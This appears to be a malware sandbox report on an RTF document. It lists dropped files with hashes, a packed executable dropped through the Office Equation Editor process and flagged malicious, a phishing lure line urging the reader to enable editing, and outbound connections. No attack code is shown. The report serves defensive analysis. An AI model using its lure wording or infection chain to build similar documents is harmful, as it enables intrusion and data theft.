                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpAD0D.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpC03.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpC14.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpC2EB.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpD181.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.3870145383915669
                                                Encrypted:false
                                                SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                MD5:1623709C6B2FB813984B1265C26A85F1
                                                SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpD182.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3008001, file counter 24, database pages 5, cookie 0xf, schema 4, UTF-8, version-valid-for 24
                                                Category:dropped
                                                Size (bytes):20480
                                                Entropy (8bit):1.3870145383915669
                                                Encrypted:false
                                                SSDEEP:48:TBLOpEO5J/Kd7UEvqckQaKgj5EZwx1wayEgd7kKK9LeYyBlIAO/tXK:hNw0CKaKfu1wai6LeYzN/9K
                                                MD5:1623709C6B2FB813984B1265C26A85F1
                                                SHA1:CCE4DDBE93E97E68359CB6FD71242F796A785F86
                                                SHA-256:88BCF762A75F085ECD3B12EB2BA81B81A7F8C9CDDDD4DED624BA28566EB7EEAA
                                                SHA-512:6D2E23E4E0D1D912AF3426129F7DE490F23326F6179EEC27AFE28C438CA37493AEA775E62755C76D6A8850DB6D6E70F0D0A8D396A35E869F4BF0F761CDD507D8
                                                Malicious:false
                                                Preview:SQLite format 3......@ .........................................................................-........#..k...#.<....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpE76F.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpE770.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 3, database pages 20, cookie 0x15, schema 4, UTF-8, version-valid-for 3
                                                Category:dropped
                                                Size (bytes):40960
                                                Entropy (8bit):0.7798653713156546
                                                Encrypted:false
                                                SSDEEP:48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
                                                MD5:CD5ACB5FAA79EEB4CDB481C6939EEC15
                                                SHA1:527F3091889C553B87B6BC0180E903E2931CCCFE
                                                SHA-256:D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
                                                SHA-512:A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
                                                Malicious:false
                                                Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF615.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF616.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF627.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF637.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF648.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF649.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Local\Temp\tmpF65A.tmp

                                                Download File
                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                File Type:SQLite 3.x database, last written using SQLite version 3032001, page size 2048, file counter 10, database pages 37, cookie 0x2f, schema 4, UTF-8, version-valid-for 10
                                                Category:dropped
                                                Size (bytes):77824
                                                Entropy (8bit):1.133993246026424
                                                Encrypted:false
                                                SSDEEP:96:LSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+S:uG8mZMDTJQb3OCaM0f6kL1Vumi
                                                MD5:8BB4851AE9495C7F93B4D8A6566E64DB
                                                SHA1:B16C29E9DBBC1E1FE5279D593811E9E317D26AF7
                                                SHA-256:143AD87B1104F156950A14481112E79682AAD645687DF5E8C9232F4B2786D790
                                                SHA-512:DDFD8A6243C2FC5EE7DAE2EAE8D6EA9A51268382730FA3D409A86165AB41386B0E13E4C2F2AC5556C9748E4A160D19B480D7B0EA23BA0671F921CB9E07637149
                                                Malicious:false
                                                Preview:SQLite format 3......@ .......%.........../......................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\2MbHBiqXH2.LNK

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:06 2023, mtime=Fri Aug 11 15:42:06 2023, atime=Mon Jun 24 15:27:02 2024, length=618938, window=hide
                                                Category:dropped
                                                Size (bytes):1014
                                                Entropy (8bit):4.564118554616871
                                                Encrypted:false
                                                SSDEEP:12:8Mg86FgXg/XAlCPCHaXZlKBSgB/BGFX+W3sfuoNDiicvbH9bI4vCDtZ3YilMMEpr:89L/XTW/bkdFOeZbiDv3qnqk7N
                                                MD5:CD629B3E1560221CE36F3F66C5C795B0
                                                SHA1:D65A0D36ED57191114409BD890EF773ADC4D6330
                                                SHA-256:EDA1C03B68779362B557B61C89BCF8030A3EFB666300BC33A12E8F512469CFDA
                                                SHA-512:DB4A7852338702C2129C47F26E6689CFB2C7A50C14DB9EEA20B2C726FF5A8811CA530486ECB363FAFB7B8AE732405668D55872463625AFBE34CF9D9B3A2DAE82
                                                Malicious:false
                                                Preview:L..................F.... ......r......r.....aXS....q...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......X]...user.8......QK.X.X].*...&=....U...............A.l.b.u.s.....z.1......WE...Desktop.d......QK.X.WE.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2..q...Xb. .2MBHBI~1.RTF..J.......WD..WD.*.........................2.M.b.H.B.i.q.X.H.2...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\965969\Users.user\Desktop\2MbHBiqXH2.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.2.M.b.H.B.i.q.X.H.2...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......965969..........D_....3N...W...9.W.e8...8.....[D_....3N...W...9.W.e8

                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Generic INItialization configuration [folders]
                                                Category:dropped
                                                Size (bytes):55
                                                Entropy (8bit):4.603998122576232
                                                Encrypted:false
                                                SSDEEP:3:H5bXLp2m4yXLp2v:HxXLpNXLpI
                                                MD5:93123BA7B281BB729F0956AED9B9E239
                                                SHA1:061A8D0029EDB2CFBC522D67CD84C49A4CCC6A01
                                                SHA-256:93E001978EB12DEA0C1288B9276BFDF8E90D863C2211223D8D7761CFB827D763
                                                SHA-512:164CEAD96BCC3BE7CAFCBCB50D9BF31CF422B02F076D41914B75D1A154E67534EBCB8164CD270CA571DBB67078067F34C24F6EE304FA6F0967720528AE48A9AA
                                                Malicious:false
                                                Preview:[misc]..2MbHBiqXH2.LNK=0..[folders]..2MbHBiqXH2.LNK=0..

                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                Category:dropped
                                                Size (bytes):2
                                                Entropy (8bit):1.0
                                                Encrypted:false
                                                SSDEEP:3:Qn:Qn
                                                MD5:F3B25701FE362EC84616A93A45CE9998
                                                SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                Malicious:false
                                                Preview:..

                                                C:\Users\user\AppData\Roaming\notorious53209.exe

                                                Download File
                                                Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                                Category:dropped
                                                Size (bytes):644096
                                                Entropy (8bit):7.796206243772775
                                                Encrypted:false
                                                SSDEEP:12288:SYV6MorX7qzuC3QHO9FQVHPF51jgcN6S5UesUInNnpo2R2:hBXu9HGaVHN6S5U5Rn/Y
                                                MD5:901A623DBCCAA22525373CD36195EE14
                                                SHA1:9ADB6DDDB68CD7E116DA9392E7EE63A8FA394495
                                                SHA-256:B5E250A95073B5DFE33F66C13CC89DA0FC8D3AF226E5EFB06BB8FCFD9A4CD6EC
                                                SHA-512:EABEBA0EB9AE7E39577A7E313E50807CEE1B888F1C8FF0FA375E5DE9451A66471C791C23EA4F4AF85151F96B065D55E8C1320026D8503A048A3E5968F8EFFC1D
                                                Malicious:true
                                                Antivirus:
                                                • Antivirus: ReversingLabs, Detection: 50%
                                                Joe Sandbox View:
                                                • Filename: Invoice LGMSCH0040924 Paid - EFT Remittance Advice and Receipt.docx.doc, Detection: malicious, Browse
                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r...........#.S..._@'.S...R.k.S....".S...RichR...................PE..L...."yf.........."......p...p....................@..........................p............@...@.......@.....................Dg..$.......Dg..................hk......................................t...H...........................................UPX0....................................UPX1.....p.......d..................@....rsrc....p.......l...h..............@..............................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

                                                C:\Users\user\Desktop\~$bHBiqXH2.rtf

                                                Download File
                                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):162
                                                Entropy (8bit):2.4797606462020307
                                                Encrypted:false
                                                SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
                                                MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
                                                SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
                                                SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
                                                SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
                                                Malicious:false
                                                Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

                                                Static File Info

                                                General

                                                File type:Rich Text Format data, version 1
                                                Entropy (8bit):3.5824693010060775
                                                TrID:
                                                • Rich Text Format (5005/1) 55.56%
                                                • Rich Text Format (4004/1) 44.44%
                                                File name:2MbHBiqXH2.rtf
                                                File size:618'938 bytes
                                                MD5:2d1b096a33d1b673fd06db9f3e861761
                                                SHA1:3c0a1d1bd1b54381df8769ecc173e8635fea366e
                                                SHA256:bf89362748b9e66c11aaa49ddf83b1665fe038d04225b36de4f26cffc11a0f3d
                                                SHA512:32156517472c8c4a6998e58bb90e0a684516a11c403d87524a8561f647901cdb9413dd71b55df4de52c88e5e522e06ee9565fc6dc653ec8f49ba5c58a3d5034e
                                                SSDEEP:6144:IwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAqtUn:+u
                                                TLSH:B3D4BF2DD34B02598F620377AB571E5142BDBB7EF38552A1302C537933EAC39A1252BE
                                                File Content Preview:{\rtf1..{\*\WauwWb33kVtBeFXoF5Me8bbkaCC88dqXB1LN0s84saDXfy7wNEIkF6fwo9WbTXUa8pudD9TZmbxq2sMJ09BBYE4OUwb26mMAnnIl6iE6rMnAeGPSXbh0yHxd3K6UwdemYg}..{\744345958please click Enable editing from the yellow bar above.The independent auditors. opinion says the fi

                                                File Icon

                                                Icon Hash:2764a3aaaeb7bdbf

                                                Static RTF Info

                                                Objects

                                                IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
                                                00002AA78hno

                                                Network Behavior

                                                Network Port Distribution

                                                TCP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Jun 24, 2024 18:27:07.716499090 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:07.716557026 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:07.716629982 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:07.747747898 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:07.747776985 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.256464958 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.256530046 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.262186050 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.262196064 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.262578011 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.262788057 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.327301025 CEST49162443192.168.2.22172.67.162.95
                                                Jun 24, 2024 18:27:08.368495941 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.444252014 CEST44349162172.67.162.95192.168.2.22
                                                Jun 24, 2024 18:27:08.444318056 CEST44349162172.67.162.95192.168.2.22
